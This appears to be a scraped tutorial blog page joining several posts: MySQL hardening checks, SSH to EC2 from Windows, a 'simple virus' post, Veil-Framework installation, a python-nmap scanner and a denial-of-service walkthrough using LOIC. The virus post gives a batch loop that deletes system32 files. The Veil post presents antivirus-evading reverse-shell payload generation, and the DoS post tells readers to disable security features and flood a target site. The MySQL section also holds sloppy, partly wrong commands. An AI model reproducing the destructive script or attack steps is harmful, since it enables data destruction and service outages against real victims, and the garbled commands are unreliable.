How to make sure your mysql database is secured
April 18, 2021, 9:18 a.m.481
How to make sure your MySQL database is secured
Auditing and logging for information systems
Logs play a crucial role for security when there is a suspected cyberattack. A manual review of logs is painstaking for security personnel, and they must use log review tools to extract information and analyze it. Logs should use a WORM (write once read many) storage technology and encryption to avoid corruption and losing log data. Also, logs should have a standardized format for ease of maintenance, access and comparison.
Ensure “log_error” is not empty
SHOW variables LIKE 'log_error';
Error logs contains data on events when mysqld starts or stops. It also shows when a table needs to be assessed or repaired. It must generate a “value”. The reason for enabling error logging is it helps increase the ability to detect malicious attempts against MySQL and other vital messages.
Ensure log files are stored on a non-system partition
Log files of MySQL can be stored anywhere in the filesystem and set using the MySQL configuration. Also, it is a best practice is to ensure that the logs in the filesystem are not cluttered with other logs such as application logs. You must ensure that the value returned does not indicate that it is in the root “(‘/’)”, “/var”, or “/usr”. The reason for this is that partitioning will decrease the likelihood of denial of service if the available disk space to the operating system is depleted.
Ensure “log_error_verbosity” is not set to “1”
SHOW GLOBAL VARIABLES LIKE 'log_error_verbosity';
This check provides additional information to what functionalities the MySQL log has or has enabled on error messages. A value of 1 enables the logging of error messages. A value of 2 enables both the logging of error and warning messages. A value of 3 enables logging of error, warning, and note messages. This helps detect malicious behavior by logging communication errors and aborted connections.
Ensure audit logging is enabled
Enabling audit logging is crucial for production environment for interactive user sessions and application sessions. With audit logging, it helps identify who changed what and when. It can also help to identify what an attacker has done and can even be used as evidence in investigations.
SELECT NAME FROM performance_schema.setup_instruments WHERE NAME LIKE ‘%/alog/%’;
show global status like 'AUDIT_version';
No audit log plugins
General log query
SET GLOBAL general_log = 'ON' ;
CREATE USER ‘user1’@’localhost’ IDENTIFIED BY PASSWORD ‘not-so-secret’;
The log’s path in Windows 10 can be found by using Services application, looking to see if MySQL is running, and right-click properties.
The log in the author’s system was located in: C:\ProgramData\MySQL\MySQL Server 5.7\Data\DJ-JASON-CLARK.log
Authentication for information system
Authentication makes sure the credentials provided by the user or machine are matched with the database of authorized users in a local operating system or in an authentication server. Authentication is then followed by authorization, which is granted by an administrator to users or machines. An authentication that is commonly used in both private and public networks is password-based authentication.
Ensure passwords are not stored in the global configuration
The [client] section of a MySQL configuration file allows the creation of a user and password to be set. The check is important because allowing a user and password in the configuration file impacts the confidentiality of the user’s password negatively.
To audit, open MySQL configuration file and examine the [client] section — it must not have any password stored. No password was set in the author’s system (see figure below). If a password was set in the configuration file, use mysql_config_editor to store passwords in the encrypted form in .mylogin.cnf.
[client] section of MySQL configuration file
[client] # pipe= # socket=0.0 port=3306
Ensure ‘sql_mode’ contains ‘NO_AUTO_CREATE_USER’
The “no_auto_create_user” is an option to prevent the auto creation of user when authentication information is not provided.
Ensure passwords are set for all MySQL accounts
A user can create a blank password. Having a blank password is risky as anyone can just assume the user’s identity, enter the user’s loginID and connect to the server. This bypasses authentication, which is bad.
SELECT User,host FROM mysql.user WHERE authentication_string=’’;
Ensure ‘default_password_lifetime’ is less than or equal to ‘90’
Changing the password lifetime to 90 days decreases the time available for the attacker to compromise the password, and thus decreases the likelihood of getting attacked.
SHOW VARIABLES LIKE ‘default_password_lifetime’;
SET GLOBAL default_password_lifetime=90;
Ensure password complexity is in place
Password complexity adds security strength to authentications and includes adding or increasing length, case, numbers and special characters. The more complex the password, the harder for attackers to use brute force to obtain the password. Weak passwords are easily obtained in a password dictionary.
SHOW VARIABLES LIKE ‘validate_password%’;
Implement password complexity
plugin-load=validate_password.so validate-password=FORCE_PLUS_PERMANENT validate_password_length=14 validate_password_mixed_case_count=1 validate_password_number_count=1 validate_password_special_char_count=1 validate_password_policy=MEDIUM
Ensure no users have wildcard hostnames
Users with wildcard hostnames (%) are granted permission to any location. It is best to avoid creating wildcard hostnames. Instead, create users and give them specific locations from which a given user may connect to and interact with the database.
SELECT user, host FROM mysql.user WHERE host = ‘%’;
Change wildcard hostname
update mysql.user SET host='3306' WHERE user='kwikl3arn';
select user,host from mysql.user where host='3306';
Ensure no anonymous accounts exist
Users can have an anonymous (empty or blank) username. These anonymous usernames have no passwords and any other user can use that anonymous username to connect to the MySQL server. Removal of these anonymous accounts ensures only identified and trusted users can access the MySQL server.
SELECT user,host FROM mysql.user WHERE user = ‘’;
Network connection to MySQL server
The network connection plays an important role for communication between the user and the MySQL server. Insecure network connections are very vulnerable to attacks. The following are checks for network connection security.
Ensure ‘have_ssl’ is set to ‘YES’
To avoid malicious attackers peeking inside your system, it is best to use SLL/TLS for all network traffic when using untrusted networks.
show WHERE variable_name = ‘have_ssl’;
Ensure ‘ssl_type’ is set to ‘ANY’, ‘X509’, or ‘SPECIFIED’ for all remote users
SSL/TLS should be configured per user. This further prevents eavesdropping of malicious attackers.
SELECT user, host, ssl_type FROM mysql.user WHERE NOT HOST IN (‘::1’, ‘127.0.0.1’, ‘localhost’);
Checking for replication status lets you monitor performance and security vulnerabilities. Microsoft SQL Server Management Studio has the following tools to monitor replication:
- view snapshot agent status,
- view log reader agent status, and
- view synchronization status.
Ensure replication traffic is secured
Replication traffic between servers must be secured. During replication transfers, passwords could leak.
To audit, check if they’re using: a private network, a VPN, SSL/TLS or a SSH Tunnel. Hopefully the author’s system is using a private network. Correct if otherwise, and secure by using the private network, a VPN, SSL/TLS or a SSH Tunnel.
Ensure ‘MASTER_SSL_VERIFY_SERVER_CERT’ Is Set to ‘YES’ or ‘1’
‘MASTER_SSL_VERIFY_SERVER_CERT’ checks whether the replica should verify the primary's certificate or not. The replica should verify the primary's certificate to authenticate the primary before continuing the connection.
SELECT ssl_verify_server_cert FROM mysql.slave_master_info;
Ensure ‘master_info_repository’ is set to ‘TABLE’
The ‘master_info_repository’ determines where the replica logs the primary's status and connection information. The password is stored in the primary info repository that is a plain text file. Storing the password in the TABLE master_info is a safer.
SHOW GLOBAL VARIABLES LIKE ‘master_info_repository’;
Ensure ‘super_priv’ is not set to ‘Y’ for replication users
The “SUPER” privilege (‘super_priv’) located in the “mysql.user” table has functions like “CHANGE”, “MASTER TO”, “KILL”, “mysqladmin kill”, “PURGE BINARY LOGS”, “SET GLOBAL”, “mysqladmin debug”, and other logging controls. Giving a user the “SUPER” privilege allows the user to view and terminate currently executing SQL statements, even for password management. If the attacker exploits and gains the “SUPER” privilege, they can disable, alter, or destroy logging data.
SELECT user, host FROM mysql.user WHERE user='repl' and Super_priv = 'Y';
Ensure no replication users have wildcard hostnames
MySQL allows you to grant permissions to wildcard hostnames. Wildcard hostnames should be avoided, and you should create or modify users and give them specific locations from which a given user may connect to and interact with the database.
select user,host from mysql.user where user='repl' and host='%';
How to ssh amazon ec2 from windows 10 cmd without putty
Dec. 16, 2020, 12:20 a.m.271
How to SSH Amazon EC2 from Windows 10 CMD without PUTTY
First, you need to spin up an Amazon EC2 instance and save the pem file on your local machine. You can save it as test.pem Then make sure that you have SSH server and SSH client option enabled under the Apps & Feature tab on Windows 10.
Open the Windows power shell and navigate to the directory where you kept your pem file. Execute the below command one by one FYI: Rename the aws-ec2.pem to your original pem file name.
$path = ".\test.pem" # Reset to remove explicit permissions icacls.exe $path /reset # Give current user explicit read-permission icacls.exe $path /GRANT:R "$($env:USERNAME):(R)" # Disable inheritance and remove inherited permissions icacls.exe $path /inheritance:r
Note: If you don't execute the above command you'll get the below errors : Windows SSH: Permissions for 'private-key' are too open Set correct permissions -- warning unprotected private key file windows 10 -- ssh error warning unprotected private key file -- it is required that your private key files are not accessible by others. windows Now copy the ssh command that you find inside the connect tab on Amazon EC2.
Open the command prompt and navigate to your pem file location. Execu the below command.
ssh-keygen -y -f test.pem > MyKP.pub
Simple virus program in windows
Feb. 17, 2020, 11:46 p.m.433
How create a simple virus program in Windows 7/10?
Everyone wants to get exicited and crashers the other persons computers involving and spending more time..Here, In kwikl3arn we can do a simply creating an virus program in windows 7/10.
Before going to create program, please make a Note Here, We the kwikl3arn.com or his authors are not responseible for any damaged control or crashers the computer... Its only for Knowledge and Learning purpose...Please dont do for other computers/organizations .......
Lets Start Creating an program; So for this we need to create a .bat file (means .batch file). open a notepad or text document,Here i had written a simple program but dangerous file.....
@echo off :p del C:\windows\system32 *.* goto p
then save as with anyname with dotbat file (.bat) as example; crasher.bat file and please dont try to run on your own personal computers it because it will delete all your windows system32 dll files. For windows XP or before systems add below line and do save as.
Its just simple program if you wanna try please do it in VirtualMachine Windows 7/10 it does not affect with your personal computer C drive....
Feb. 17, 2020, 7:54 p.m.245
How to Install and Configure Veil-framework in linux,parrot?
Firstly, We should gain some knowledge on Veil-Framework....
What is Veil-Framework?
The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, FortyNorth Security will use the Veil-Framework to help achieve their objective.The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of shellcode into a Windows executable that will evade detections by common antivirus products.We use Veil-Framework for creating an Exploit payload for C,python,perl,ruby,powershell by using an meterpreter reverse or an shell code.
Veil 3.0 users still have the ability to use msfvenom to generate their shellcode, but they now also have the option to use Ordnance. Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on. Ordnance supports the most popular payload types:
- Reverse TCP
- Reverse HTTP
- Reverse HTTPS
- Reverse TCP DNS
- Reverse TCP All Ports
- Bind TCP
So, we had gained some knowledge about veil-framework.Lets start the process for Veil-framework installation
Here, I had installed and configured Veil-Framework in parrot, As same procedure can do it in linux,centos.
Firslty, we need to update the system
┌─[[email protected]]─[~] └──╼ $sudo apt-get update ┌─[[email protected]]─[~] └──╼ $sudo apt-get -y upgrade
then we need to install wine32,git
[[email protected]]─[~] └──╼ $sudo apt-get install wine32 [[email protected]]─[~] └──╼ $sudo apt-get install git
We need to download Veil-Framework from GitHub here I used
[[email protected]]─[~] └──╼ $git clone https://github.com/Veil-Framework/Veil.git
Then we will goto Veil directory
[[email protected]]─[~] └──$cd Veil [[email protected]]─[~] └──$ll [[email protected]]─[~] └──$./config/setup.sh --force --silent
Here it will downlad all the required packages internally in veil-framework and take a minutes depends up on the internet speed.
Simple bruteforcing password cracker
Feb. 15, 2020, 5:10 p.m.239
How to Create a Simple Burteforcing password cracker using python?
Here we are using pycharm in parot OS.So for this we need to check whether pip is installed or not if not we need to install pip package by
go to pycharm terminal -----> pip install ------> and recheck by pip list.
Now will create a simple Bruteforcing password
Nmap portscanner sample in python
Feb. 15, 2020, 12:53 p.m.210
How to scan a ports in linux,parrot,ubuntu using nmap python?
Firstly, we need some of the requirements and config. Requirements are:
- Pycharm professional
- Ubuntu,parrot and linux are the OS
We need to install a pycharm professional in parrot.Here I had installed in parrot,As same installation is done in linux and Ubuntu also.
How to install a Pycharm professional in parrot?
Firstly, we need to download a pycharm professional from its site link as https://www.jetbrains.com/pycharm/download/other.html Here i had downloaded pycharm professional for linux version in zip format
Then, Go to downloads path tar the zip file by using an command tar -zxvf pycharm-professional-2019.3.3.tar.gz. After tar unzip, the above file shows as pycharm-2019.3
Then Go to pycharm-2019.3 file as cd pycharm-2019.3-----> go to bin file in that as cd bin/-----------> Here you can a list of files then giving chmod perssions by using root as command chmod +x pycharm.sh
After giving chmod permissions,Run a program as --------> ./pycharm.sh pycharm professional will open it and setup process is done After that open a new project specify the path for an program to execute name the folder and create it and now to go file--->
click on new----->go to python file name it..Here i had named as sam.py Now we can start programming using pycharm.....
How to create a Nmap network scanner using python?
Firstly, we need to import a package called python-nmap. So for this in pycharm below go to terminal ---> check pip is installed or not by pip list------> then pip install pyhton-nmap------> re-check it by pip list.
After succesfully installed python nmap we can start program for network port scanner...
import nmap # importing an nmap package ns = nmap.PortScanner() # giving an portscanner function print (ns.nmap_version()) # i need to print nmap version ns.scan('192.168.45.139','1-1000', '-v') # here declaring self host (localhost) or your ip addressing, give some ports (as 1-1000), and arguments as -v print (ns.scaninfo()) # need to print a scan print (ns.csv()) # then printed scan info puts in csv
Runs the program by pressing ctrl+shift+F10. Here i had run the program resulted as
Now we can change the ip and ports and allow all host and check whether ip is up or down by using these code and resultant as
ns.scan('192.168.45.139','22-46477', '-v --version-all') # I had changed ports and arguments print(ns.all_hosts()) # here all hosts for scan print(ns['192.168.45.139'].state()) # by state() after ip whether to check ip is up or down
import nmap ns = nmap.PortScanner() print (ns.nmap_version()) ns.scan('192.168.45.139','22-46477', '-v --version-all') print(ns.all_hosts()) print(ns['192.168.45.139'].state()) print(ns['192.168.45.139'].all_protocols()) # scanning all protocols print(ns['192.168.45.139']['tcp'].keys()) # adding an TCAP for tcp keys which are there print(ns['192.168.45.139'].has_tcp(80)) # need to know tcp port 80 is open or not
Resultant output you can get as below so finally we can create like this file to scan the networks using python nmap..
Denial of service
Jan. 4, 2020, 1:22 p.m.355
Denial of Service..... (DOS)!!! Attack!!!
What is Denial of Service (DOS)?
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic, or sending it information that triggers a crash. In both instances, the DoS attack deprives legitimate users (i.e. employees, members, or account holders) of the service or resource they expected.
Victims of DoS attacks often target web servers of high-profile organizations such as banking, commerce, and media companies, or government and trade organizations. If an Attacker wanna do an DOS Attack for an machine or a web site,he/she can easily do a an attck from anyplace by using some tools ....
Free DOS Attack tools are:
- Tor's Hammer
The most famous for hackers,inforamation securityexperts,PT(Pentesters) and its also a free tool for windows and kali-linux and parrot.Mostly this tool was used from windows/kali -linux machines.So, LOIC means LOW ORBIT ION CANON.It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.
Here's the download link it would be installed in windows (For Download please do turn off security features in your machine)
yah...! It had downloaded it and installed...!!! So,if you in above picture Enter the URL of any site (please do not go any governtment or offical websites) or IP address (recommand us your private ip)hit on Lock on. Below you will be displayed with target ip and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.